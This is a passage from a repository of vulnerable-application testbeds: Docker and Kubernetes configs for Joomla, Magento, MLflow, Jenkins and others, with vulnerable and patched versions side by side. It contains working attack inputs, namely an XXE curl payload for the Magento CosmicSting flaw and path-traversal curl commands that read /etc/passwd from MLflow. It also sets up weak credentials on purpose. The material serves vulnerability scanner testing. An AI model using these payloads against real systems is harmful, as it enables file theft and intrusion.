11 | 12 | ## Fixed version 13 | docker run -it -p 8080:8080 jenkins/jenkins:2.426.3 14 | -------------------------------------------------------------------------------- /jenkins/weak_credentials/jenkins.md: -------------------------------------------------------------------------------- 1 | # Jenkins 2 | # Setup 3 | 1: Create docker images with this command: `docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:lts-jdk11` 4 | 5 | 2: Verify docker is up with this command and check ports: `docker ps` 6 | 7 | 3: Connect to it locally by going to localhost:8080 8 | 9 | 4: Configure it using the setup client. During the docker boot up it will print a secret password, copy and paste it into the client to proceed. 10 | 11 | 5: Verify to see if working properly: Log in by visiting localhost:8080 and using root credentials 12 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/README.md: -------------------------------------------------------------------------------- 1 | # Joomla CVE-2015-8562 2 | 3 | This directory contains the deployment configs for an setup Joomla installation 4 | that's vulnerable to CVE-2015-8562 (Joomla HTTP Header Unauthenticated Remote 5 | Code Execution). 6 | 7 | The deployed service has name `joomla-cve-2015-8562` and listens on port `80`. 8 | 9 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/joomla.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the Joomla app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: joomla-cve-2015-8562 6 | labels: 7 | app: joomla-cve-2015-8562 8 | spec: 9 | ports: 10 | - port: 80 11 | selector: 12 | app: joomla-cve-2015-8562 13 | tier: frontend 14 | type: LoadBalancer 15 | --- 16 | # Joomla application. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: joomla-cve-2015-8562 21 | labels: 22 | app: joomla-cve-2015-8562 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: joomla-cve-2015-8562 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: joomla-cve-2015-8562 34 | tier: frontend 35 | spec: 36 | containers: 37 | - image: ${joomla_img} 38 | name: joomla-cve-2015-8562 39 | env: 40 | - name: JOOMLA_DB_HOST 41 | value: "joomla-cve-2015-8562-mysql:3306" 42 | - name: JOOMLA_DB_PASSWORD 43 | value: "joomla" 44 | ports: 45 | - containerPort: 80 46 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/joomla_img/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM joomla:3.4.3-apache 2 | 3 | COPY config/configuration.php /var/www/html/configuration.php 4 | COPY config/custom_entry.sh /custom_entry.sh 5 | ENTRYPOINT ["/custom_entry.sh"] 6 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/joomla_img/config/configuration.php: -------------------------------------------------------------------------------- 1 | Please check back again soon.'; 5 | public $display_offline_message = '1'; 6 | public $offline_image = ''; 7 | public $sitename = 'Testbed'; 8 | public $editor = 'tinymce'; 9 | public $captcha = '0'; 10 | public $list_limit = '20'; 11 | public $access = '1'; 12 | public $debug = '0'; 13 | public $debug_lang = '0'; 14 | public $dbtype = 'mysqli'; 15 | public $host = 'joomla-cve-2015-8562-mysql:3306'; 16 | public $user = 'root'; 17 | public $password = 'joomla'; 18 | public $db = 'joomla'; 19 | public $dbprefix = 'rst5x_'; 20 | public $live_site = ''; 21 | public $secret = '7q330HJ0V1KKHZav'; 22 | public $gzip = '0'; 23 | public $error_reporting = 'default'; 24 | public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}'; 25 | public $ftp_host = ''; 26 | public $ftp_port = ''; 27 | public $ftp_user = ''; 28 | public $ftp_pass = ''; 29 | public $ftp_root = ''; 30 | public $ftp_enable = '0'; 31 | public $offset = 'UTC'; 32 | public $mailonline = '1'; 33 | public $mailer = 'mail'; 34 | public $mailfrom = 'noreply@google.com'; 35 | public $fromname = 'Testbed'; 36 | public $sendmail = '/usr/sbin/sendmail'; 37 | public $smtpauth = '0'; 38 | public $smtpuser = ''; 39 | public $smtppass = ''; 40 | public $smtphost = 'localhost'; 41 | public $smtpsecure = 'none'; 42 | public $smtpport = '25'; 43 | public $caching = '0'; 44 | public $cache_handler = 'file'; 45 | public $cachetime = '15'; 46 | public $MetaDesc = ''; 47 | public $MetaKeys = ''; 48 | public $MetaTitle = '1'; 49 | public $MetaAuthor = '1'; 50 | public $MetaVersion = '0'; 51 | public $robots = ''; 52 | public $sef = '1'; 53 | public $sef_rewrite = '0'; 54 | public $sef_suffix = '0'; 55 | public $unicodeslugs = '0'; 56 | public $feed_limit = '10'; 57 | public $log_path = '/var/www/html/logs'; 58 | public $tmp_path = '/var/www/html/tmp'; 59 | public $lifetime = '15'; 60 | public $session_handler = 'database'; 61 | } 62 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/joomla_img/config/custom_entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | /entrypoint.sh apache2-foreground & 3 | while [[ ! -d /var/www/html/installation ]] 4 | do 5 | sleep 1; 6 | done; 7 | rm -rf /var/www/html/installation 8 | tail -f /dev/null 9 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/mysql.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the MySQL service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: joomla-cve-2015-8562-mysql 6 | labels: 7 | app: joomla-cve-2015-8562 8 | spec: 9 | ports: 10 | - port: 3306 11 | selector: 12 | app: joomla-cve-2015-8562 13 | tier: joomla-cve-2015-8562-mysql 14 | clusterIP: None 15 | --- 16 | # The MySQL app. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: joomla-cve-2015-8562-mysql 21 | labels: 22 | app: joomla-cve-2015-8562 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: joomla-cve-2015-8562 27 | tier: joomla-cve-2015-8562-mysql 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: joomla-cve-2015-8562 34 | tier: joomla-cve-2015-8562-mysql 35 | spec: 36 | containers: 37 | - image: ${mysql_img} 38 | name: joomla-cve-2015-8562-mysql 39 | env: 40 | - name: MYSQL_ROOT_PASSWORD 41 | value: "joomla" 42 | ports: 43 | - containerPort: 3306 44 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/mysql_img/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mysql:5.7 2 | 3 | COPY config/joomla.sql /docker-entrypoint-initdb.d/joomla.sql 4 | -------------------------------------------------------------------------------- /joomla/CVE-2023-23752/Readme.md: -------------------------------------------------------------------------------- 1 | # vulnerable instance 2 | run `docker compose -f docker-compose-vulnerable.yml up` and open http://localhost:8000/ and then use the following information to finish the initial setup of the new Joomla instance: 3 | ``` 4 | Database type: MySQLi 5 | 6 | Enter the host name, usually "localhost" or a name provided by your host: 7 | joomlaDb 8 | 9 | Either a username you created or a username provided by your host: 10 | root 11 | 12 | Either a password you created or a password provided by your host: 13 | example 14 | 15 | ``` 16 | Run `curl http://localhost:8000/api/index.php/v1/config/application?public=true` to confirm the exposed data. 17 | 18 | # secure instance 19 | first run `docker compose -f docker-compose-vulnerable.yml down` and then run `docker compose -f docker-compose-safe.yml up` and open http://localhost:8000/ and then use the following information to finish the initial setup of the new Joomla instance: 20 | ``` 21 | Database type: MySQLi 22 | 23 | Enter the host name, usually "localhost" or a name provided by your host: 24 | joomlaDb 25 | 26 | Either a username you created or a username provided by your host: 27 | root 28 | 29 | Either a password you created or a password provided by your host: 30 | example 31 | ``` 32 | Run `curl http://localhost:8000/api/index.php/v1/config/application?public=true` to confirm that this instance is secure. you should receive the `{"errors":[{"title":"Forbidden"}]}` in response. 33 | -------------------------------------------------------------------------------- /joomla/CVE-2023-23752/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | name: joomla-cve-2023-23752-safe 2 | services: 3 | joomla: 4 | image: joomla:4.2.8-php8.0 5 | ports: 6 | - 8000:80 7 | environment: 8 | JOOMLA_DB_HOST: joomladb 9 | JOOMLA_DB_PASSWORD: example 10 | depends_on: 11 | - joomlaDb 12 | 13 | joomlaDb: 14 | image: mysql:5.6 15 | environment: 16 | MYSQL_ROOT_PASSWORD: example 17 | -------------------------------------------------------------------------------- /joomla/CVE-2023-23752/docker-compose-vulnerable.yml: -------------------------------------------------------------------------------- 1 | name: joomla-cve-2023-23752-vulnerable 2 | services: 3 | joomla: 4 | image: joomla:4.2.6-php8.0 5 | ports: 6 | - 8000:80 7 | environment: 8 | JOOMLA_DB_HOST: joomladb 9 | JOOMLA_DB_PASSWORD: example 10 | depends_on: 11 | - joomlaDb 12 | 13 | joomlaDb: 14 | image: mysql:5.6 15 | environment: 16 | MYSQL_ROOT_PASSWORD: example 17 | -------------------------------------------------------------------------------- /joomla/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.1' 2 | 3 | services: 4 | joomla: 5 | image: joomla:latest 6 | restart: always 7 | links: 8 | - joomladb:mysql 9 | ports: 10 | - 8080:80 11 | environment: 12 | JOOMLA_DB_HOST: joomladb 13 | JOOMLA_DB_PASSWORD: example 14 | 15 | joomladb: 16 | image: mysql:5.6 17 | restart: always 18 | ports: 19 | - 3306:3306 20 | environment: 21 | MYSQL_ROOT_PASSWORD: example -------------------------------------------------------------------------------- /joomla/weak_credentials/joomla.md: -------------------------------------------------------------------------------- 1 | # Joomla 2 | # Setup 3 | 4 | 1. View the docker-compose.yml file to view the selected password 5 | 6 | 2. Run the compose file in this directory: `docker-compose up` 7 | 8 | 3. Connect to it locally by going to `localhost:8080` and configure it using the setup client 9 | 10 | 4. Verify to see if working properly: Log in by visiting `localhost:8080` and using root credentials 11 | -------------------------------------------------------------------------------- /jupyter/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Jupyter Notebook 2 | 3 | This directory contains the deployment configs for a simple Jupyter Notebook 4 | application. The service listens on port `80`. 5 | 6 | This configs deploys the following services: 7 | 8 | - `jupyter`: the Jupyter Notebook application. 9 | -------------------------------------------------------------------------------- /jupyter/exposed_ui/jupyter.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the Jupyter Notebook app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: jupyter 6 | labels: 7 | app: jupyter 8 | version: ${jupyter_version} 9 | spec: 10 | ports: 11 | - port: 80 12 | name: http 13 | targetPort: 8888 14 | selector: 15 | app: jupyter 16 | version: ${jupyter_version} 17 | type: LoadBalancer 18 | --- 19 | # The Jupyter Notebook app. 20 | apiVersion: apps/v1 21 | kind: Deployment 22 | metadata: 23 | name: jupyter 24 | labels: 25 | app: jupyter 26 | version: ${jupyter_version} 27 | spec: 28 | selector: 29 | matchLabels: 30 | app: jupyter 31 | version: ${jupyter_version} 32 | tier: frontend 33 | strategy: 34 | type: Recreate 35 | template: 36 | metadata: 37 | labels: 38 | app: jupyter 39 | tier: frontend 40 | version: ${jupyter_version} 41 | spec: 42 | containers: 43 | - name: jupyter 44 | image: jupyter/base-notebook:${jupyter_version} 45 | ports: 46 | - containerPort: 8888 47 | command: [ "start-notebook.sh" ] 48 | args: [ "--NotebookApp.token='${notebook_token}'" ] 49 | -------------------------------------------------------------------------------- /liferay/liferay-portal/CVE-2020-7961/README.md: -------------------------------------------------------------------------------- 1 | # Liferay Portal 2 | 3 | This directory contains the deployment configs for Liferay Portal. The service 4 | listens on port 80. Version `7.2.0-ga1`is vulnerable. 5 | 6 | This configs deploys the following services: 7 | 8 | - `liferay-portal`: the application 9 | -------------------------------------------------------------------------------- /liferay/liferay-portal/CVE-2020-7961/liferay-portal.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the Liferay Portal. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: liferay-portal 6 | labels: 7 | app: liferay-portal 8 | version: ${liferay_portal_version} 9 | spec: 10 | ports: 11 | - port: 80 12 | name: http 13 | targetPort: 8080 14 | selector: 15 | app: liferay-portal 16 | version: ${liferay_portal_version} 17 | type: LoadBalancer 18 | --- 19 | apiVersion: apps/v1 20 | kind: Deployment 21 | metadata: 22 | name: liferay-portal 23 | labels: 24 | app: liferay-portal 25 | version: ${liferay_portal_version} 26 | spec: 27 | selector: 28 | matchLabels: 29 | app: liferay-portal 30 | version: ${liferay_portal_version} 31 | tier: frontend 32 | strategy: 33 | type: Recreate 34 | template: 35 | metadata: 36 | labels: 37 | app: liferay-portal 38 | tier: frontend 39 | version: ${liferay_portal_version} 40 | spec: 41 | containers: 42 | - name: liferay-portal 43 | image: liferay/portal:${liferay_portal_version} 44 | ports: 45 | - containerPort: 8080 46 | -------------------------------------------------------------------------------- /magento/CVE-2024-34102_CosmicSting/README.md: -------------------------------------------------------------------------------- 1 | # Magento / Adobe Commerce CosmicSting XXE (CVE-2024-34102) 2 | 3 | ## Description 4 | Adobe Commerce and Magento v2.4.7 and earlier are vulnerable to a critical unauthenticated XXE (XML External Entity) vulnerability that can lead to arbitrary code execution. The vulnerability can be exploited by sending an unauthenticated HTTP request with a crafted XML file that references external entities; when the request payload is deserialized, the attacker can extract sensitive files from the system and gain administrative access to the software. Remote Code Execution (RCE) can accomplished by combining this issue with another vulnerability, such as the [PHP iconv RCE](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1). 5 | 6 | ## Launch Testbed 7 | 8 | ### Vulnerable version 9 | Launch vulnerable version: Magento v2.4.7-p0. 10 | ```sh 11 | docker compose -f docker-compose-vuln.yml up 12 | ``` 13 | 14 | ### Safe version 15 | Launch safe version: Magento v2.4.7-p2. 16 | ```sh 17 | docker compose -f docker-compose-safe.yml up 18 | ``` 19 | 20 | ## Vulnerability Test 21 | You can use the following command to check whether the instance is vulnerable or not (credits to vicarius.io): 22 | ```sh 23 | curl -k -X POST \ 24 | http://127.0.0.1:8080/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods \ 25 | -H "Content-Type: application/json" \ 26 | -d '{ 27 | "address": { 28 | "totalsReader": { 29 | "collectorList": { 30 | "totalCollector": { 31 | "sourceData": { 32 | "data": " \"> %sp; %param1; ]>&exfil;", 33 | "options": 16 34 | } 35 | } 36 | } 37 | } 38 | } 39 | }' 40 | ``` 41 | 42 | A vulnerable instance will reply with the following message: 43 | ```json 44 | {"message":"Internal Error. Details are available in Magento log file. Report ID: webapi-66d8a8d363765"} 45 | ``` 46 | while a safe instance will output the following: 47 | ```json 48 | {"message":"Invalid data type"} 49 | ``` 50 | Moreover, you can replace `` with the URL of a request canary service (such as Burp Collaborator) to verify if you receive a callback. A safe instance will not fetch the URL, while a vulnerable one will. 51 | 52 | ## Affected Versions 53 | - 2.4.7 and earlier 54 | - 2.4.6-p5 and earlier 55 | - 2.4.5-p7 and earlier 56 | - 2.4.4-p8 and earlier 57 | - 2.4.3-ext-7 and earlier* 58 | - 2.4.2-ext-7 and earlier* 59 | 60 | *These versions are only applicable to customers participating in the Extended Support Program 61 | 62 | ## References 63 | - [CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)](https://www.vicarius.io/vsociety/posts/cosmicsting-critical-unauthenticated-xxe-vulnerability-in-adobe-commerce-and-magento-cve-2024-34102) 64 | - [NIST: CVE-2024-34102](https://nvd.nist.gov/vuln/detail/CVE-2024-34102) 65 | - [Adobe Security Bulletin APSB24-40](https://helpx.adobe.com/security/products/magento/apsb24-40.html) 66 | -------------------------------------------------------------------------------- /magento/CVE-2024-34102_CosmicSting/apply-patch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "==== Patching Magento against CosmicSting XXE (CVE-2024-34102)" 4 | echo "Installing tools needed to apply patch" 5 | export DEBIAN_FRONTEND=noninteractive 6 | apt-get update -y 7 | apt-get install -y wget unzip patch 8 | 9 | echo "Downloading patch from Adobe's website" 10 | cd /opt/bitnami/magento 11 | wget "https://experienceleague.adobe.com/docs/commerce-knowledge-base/assets/VULN-27015-2.4.7x_v2_COMPOSER_patch.zip" 12 | unzip -o VULN-27015-2.4.7x_v2_COMPOSER_patch.zip 13 | 14 | echo "Applying patch" 15 | patch -p1 < VULN-27015-2.4.7x_v2.composer.patch 16 | 17 | echo "==== Patching done. Starting Magento now. ====" 18 | /opt/bitnami/scripts/magento/entrypoint.sh /opt/bitnami/scripts/magento/run.sh -------------------------------------------------------------------------------- /magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | # Original from: https://raw.githubusercontent.com/bitnami/containers/main/bitnami/magento/docker-compose.yml 2 | # Copyright Broadcom, Inc. All Rights Reserved. 3 | # SPDX-License-Identifier: APACHE-2.0 4 | 5 | name: magento-safe 6 | services: 7 | mariadb: 8 | image: docker.io/bitnami/mariadb:10.6 9 | environment: 10 | - ALLOW_EMPTY_PASSWORD=yes 11 | - MARIADB_USER=bn_magento 12 | - MARIADB_DATABASE=bitnami_magento 13 | magento: 14 | image: docker.io/bitnami/magento:2.4.7-debian-12-r15 15 | ports: 16 | - '8080:8080' 17 | environment: 18 | - MAGENTO_HOST=127.0.0.1:8080 19 | - MAGENTO_DATABASE_HOST=mariadb 20 | - MAGENTO_DATABASE_PORT_NUMBER=3306 21 | - MAGENTO_DATABASE_USER=bn_magento 22 | - MAGENTO_DATABASE_NAME=bitnami_magento 23 | - ELASTICSEARCH_HOST=elasticsearch 24 | - ELASTICSEARCH_PORT_NUMBER=9200 25 | - ALLOW_EMPTY_PASSWORD=yes 26 | depends_on: 27 | - mariadb 28 | - elasticsearch 29 | # The apply-patch.sh script will apply the vulnerability patch before Magento is set up 30 | volumes: 31 | - './apply-patch.sh:/apply-patch.sh' 32 | command: /apply-patch.sh 33 | elasticsearch: 34 | image: docker.io/bitnami/elasticsearch:7 35 | -------------------------------------------------------------------------------- /magento/CVE-2024-34102_CosmicSting/docker-compose-vuln.yml: -------------------------------------------------------------------------------- 1 | # Original from: https://raw.githubusercontent.com/bitnami/containers/main/bitnami/magento/docker-compose.yml 2 | # Copyright Broadcom, Inc. All Rights Reserved. 3 | # SPDX-License-Identifier: APACHE-2.0 4 | 5 | name: magento-vulnerable 6 | services: 7 | mariadb: 8 | image: docker.io/bitnami/mariadb:10.6 9 | environment: 10 | - ALLOW_EMPTY_PASSWORD=yes 11 | - MARIADB_USER=bn_magento 12 | - MARIADB_DATABASE=bitnami_magento 13 | magento: 14 | image: docker.io/bitnami/magento:2.4.7-debian-12-r15 15 | ports: 16 | - '8080:8080' 17 | environment: 18 | - MAGENTO_HOST=127.0.0.1:8080 19 | - MAGENTO_DATABASE_HOST=mariadb 20 | - MAGENTO_DATABASE_PORT_NUMBER=3306 21 | - MAGENTO_DATABASE_USER=bn_magento 22 | - MAGENTO_DATABASE_NAME=bitnami_magento 23 | - ELASTICSEARCH_HOST=elasticsearch 24 | - ELASTICSEARCH_PORT_NUMBER=9200 25 | - ALLOW_EMPTY_PASSWORD=yes 26 | depends_on: 27 | - mariadb 28 | - elasticsearch 29 | elasticsearch: 30 | image: docker.io/bitnami/elasticsearch:7 -------------------------------------------------------------------------------- /microsoft/mssql/weak_credentials/mssql.md: -------------------------------------------------------------------------------- 1 | # MSSQL 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run --name -e "ACCEPT_EULA=Y" -e "MSSQL_SA_PASSWORD=" -p 1433:1433 -d mcr.microsoft.com/mssql/server:2022-latest` 5 | * Note: Password requirement for root user: A strong system administrator (SA) password: At least 8 characters including uppercase, lowercase letters, base-10 digits and/or non-alphanumeric symbols. 6 | 7 | 2. Verify MSSQL is working as intended: `docker exec -it /opt/mssql-tools/bin/sqlcmd -S -U sa -P ` -------------------------------------------------------------------------------- /microsoft/rdp/weak_credentials/rdp.md: -------------------------------------------------------------------------------- 1 | # RDP 2 | # Setup 3 | 1. Create a Windows server machine on GCE. 4 | 5 | 2. Once the instance is created, follow the instructions in the following link to generate a new password: https://cloud.google.com/compute/docs/instances/windows/generating-credentials#generate_credentials 6 | 7 | 3. Download Remote Desktop Viewer at the Google Software Center or use another RDP client. 8 | 4. Connect to the host using the set username and password. -------------------------------------------------------------------------------- /mlflow/CVE-2023-1177/README.md: -------------------------------------------------------------------------------- 1 | # MLflow CVE-2023-1177 2 | 3 | mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models. Affected versions of this package are vulnerable to Improper Access Control which enables malicious actors to download arbitrary files unrelated to MLflow from the host server, including any files stored in remote locations to which the host server has access. 4 | 5 | ```sh 6 | docker-compose -f docker-compose.yml up 7 | ``` 8 | 9 | It takes several minutes to wait for the service to be accessed normally, and the exposed web service port is [15000]. 10 | 11 | ## Environment Variable List 12 | 13 | > The environment variables starting with AWS are used for MINIO configuration. 14 | 15 | - AWS_ACCESS_KEY_ID 16 | - AWS_SECRET_ACCESS_KEY 17 | - AWS_REGION 18 | - AWS_BUCKET_NAME 19 | - MYSQL_DATABASE 20 | - MYSQL_ROOT_PASSWORD 21 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-1177/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | services: 3 | s3: 4 | image: minio/minio:RELEASE.2021-11-24T23-19-33Z 5 | restart: unless-stopped 6 | ports: 7 | - "9000:9000" 8 | - "9001:9001" 9 | environment: 10 | - MINIO_ROOT_USER=${AWS_ACCESS_KEY_ID} 11 | - MINIO_ROOT_PASSWORD=${AWS_SECRET_ACCESS_KEY} 12 | command: server /data --console-address ":9001" 13 | networks: 14 | - internal 15 | - public 16 | volumes: 17 | - minio_volume:/data 18 | db: 19 | image: mysql:8.2.0 20 | restart: unless-stopped 21 | container_name: mlflow_db 22 | expose: 23 | - "3306" 24 | environment: 25 | - MYSQL_DATABASE=${MYSQL_DATABASE} 26 | - MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD} 27 | - MYSQL_ROOT_HOST=% 28 | networks: 29 | - internal 30 | mlflow: 31 | container_name: tracker_mlflow_vuln 32 | image: tracker_ml_vuln 33 | restart: unless-stopped 34 | build: 35 | context: ./mlflow-vuln 36 | dockerfile: Dockerfile 37 | ports: 38 | - "15000:5000" 39 | environment: 40 | - AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID} 41 | - AWS_SECRET_ACCESS_KEY=${AWS_SECRET_ACCESS_KEY} 42 | - AWS_DEFAULT_REGION=${AWS_REGION} 43 | - MLFLOW_S3_ENDPOINT_URL=http://s3:9000 44 | networks: 45 | - public 46 | - internal 47 | entrypoint: mlflow server --backend-store-uri mysql+pymysql://root:${MYSQL_ROOT_PASSWORD}@db:3306/${MYSQL_DATABASE} --default-artifact-root s3://${AWS_BUCKET_NAME}/ --artifacts-destination s3://${AWS_BUCKET_NAME}/ -h 0.0.0.0 48 | depends_on: 49 | wait-for-db: 50 | condition: service_completed_successfully 51 | create_s3_buckets: 52 | image: minio/mc 53 | depends_on: 54 | - "s3" 55 | entrypoint: > 56 | /bin/sh -c " 57 | until (/usr/bin/mc alias set minio http://s3:9000 '${AWS_ACCESS_KEY_ID}' '${AWS_SECRET_ACCESS_KEY}') do echo '...waiting...' && sleep 1; done; 58 | /usr/bin/mc mb minio/${AWS_BUCKET_NAME}; 59 | exit 0; 60 | " 61 | networks: 62 | - internal 63 | wait-for-db: 64 | image: atkrad/wait4x 65 | depends_on: 66 | - db 67 | command: tcp db:3306 -t 90s -i 250ms 68 | networks: 69 | - internal 70 | networks: 71 | internal: 72 | public: 73 | driver: bridge 74 | volumes: 75 | db_volume: 76 | minio_volume: 77 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-1177/mlflow-vuln/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ghcr.io/mlflow/mlflow:v2.0.0 2 | 3 | RUN pip install boto3 pymysql cryptography 4 | 5 | ADD . /app 6 | WORKDIR /app 7 | 8 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/README.md: -------------------------------------------------------------------------------- 1 | # MLflow CVE-2023-6014 2 | 3 | This directory contains the deployment config for MLflow instances vulnerable and fixed to CVE-2023-6014. MLflow versions below 2.8.0 are vulnerable to that authentication bypass vulnerability. 4 | 5 | The deployed service listens on port `5000` after the docker completes its job. 6 | 7 | ## Vulnerable version 8 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.7.1 mlflow server --app-name basic-auth --host 0.0.0.0 --port 5000 9 | 10 | ## Fixed version 11 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.8.1 mlflow server --app-name basic-auth --host 0.0.0.0 --port 5000 12 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | # Copyright 2020 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | FROM ghcr.io/mlflow/mlflow:v2.6.0 as chroot 15 | 16 | RUN /usr/sbin/useradd -u 1000 user 17 | COPY flag / 18 | COPY chal.sh /home/user/ 19 | COPY socat /home/user/ 20 | RUN mkdir /home/user/mlruns 21 | 22 | FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f 23 | 24 | COPY --from=chroot / /chroot 25 | 26 | COPY nsjail.cfg /home/user/ 27 | 28 | CMD kctf_setup && \ 29 | kctf_drop_privs \ 30 | socat \ 31 | TCP-LISTEN:1337,reuseaddr,fork \ 32 | EXEC:"nsjail --config /home/user/nsjail.cfg -- /home/user/chal.sh" -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/challenge/README.md: -------------------------------------------------------------------------------- 1 | Prerequisite: To build the image from the Dockerfile, a socat binary is required to be copied to current folder. 2 | 3 | 4 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/challenge/chal.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | mlflow server --host 127.0.0.1:5000 2>&1 & 3 | 4 | /home/user/socat TCP:127.0.0.1::5000,retry,forever stdio 5 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/challenge/nsjail.cfg: -------------------------------------------------------------------------------- 1 | # Copyright 2020 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # See options available at https://github.com/google/nsjail/blob/master/config.proto 16 | 17 | name: "default-nsjail-configuration" 18 | description: "Default nsjail configuration for pwnable-style CTF task." 19 | 20 | mode: ONCE 21 | uidmap {inside_id: "1000"} 22 | gidmap {inside_id: "1000"} 23 | rlimit_as_type: HARD 24 | rlimit_cpu_type: HARD 25 | rlimit_nofile_type: HARD 26 | rlimit_nproc_type: HARD 27 | 28 | cwd: "/home/user" 29 | 30 | keep_env: true 31 | 32 | mount: [ 33 | { 34 | src: "/chroot" 35 | dst: "/" 36 | is_bind: true 37 | }, 38 | { 39 | dst: "/tmp" 40 | fstype: "tmpfs" 41 | rw: true 42 | }, 43 | { 44 | dst: "/home/user/mlruns" 45 | fstype: "tmpfs" 46 | rw: true 47 | }, 48 | { 49 | dst: "/proc" 50 | fstype: "proc" 51 | rw: true 52 | }, 53 | { 54 | src: "/etc/resolv.conf" 55 | dst: "/etc/resolv.conf" 56 | is_bind: true 57 | }, 58 | { 59 | src: "/dev" 60 | dst: "/dev" 61 | is_bind: true 62 | }, 63 | { 64 | src: "/dev/null" 65 | dst: "/dev/null" 66 | is_bind: true 67 | } 68 | ] 69 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6977/README.md: -------------------------------------------------------------------------------- 1 | # MLflow CVE-2023-6977 2 | 3 | This directory contains the deployment config for MLflow instances vulnerable and fixed to CVE-2023-6977. MLflow versions below 2.9.2 are vulnerable to that arbitrary file read vulnerability. 4 | 5 | The deployed service listens on port `5000` after the docker completes its job. 6 | 7 | ## Fixed version 8 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.10.0 mlflow server --host 0.0.0.0 --port 5000 9 | 10 | ## Vulnerable version 11 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.2.0 mlflow server --host 0.0.0.0 --port 5000 12 | -------------------------------------------------------------------------------- /mlflow/CVE-2024-2928/README.md: -------------------------------------------------------------------------------- 1 | # MLflow CVE-2024-2928 2 | 3 | This directory contains the deployment config for MLflow instances vulnerable and fixed to CVE-2024-2928. MLflow versions below 2.11.2 are vulnerable to that arbitrary file read vulnerability. 4 | 5 | ## How to Trigger the Vulnerability? 6 | 7 | To trigger the vulnerability, you can use the following five curl commands. In a vulnerable environment, after the final curl request, you can see the /etc/passwd file content in the response. 8 | ``` 9 | # Create a malicious experiment: 10 | curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/create' 11 | 12 | # Associate a run to it (EXPERIMENT_ID is coming from the first curl request's response): 13 | curl -X POST -H 'Content-Type: application/json' -d '{"experiment_id": "EXPERIMENT_ID"}' 'http://127.0.0.1:5000/api/2.0/mlflow/runs/create' 14 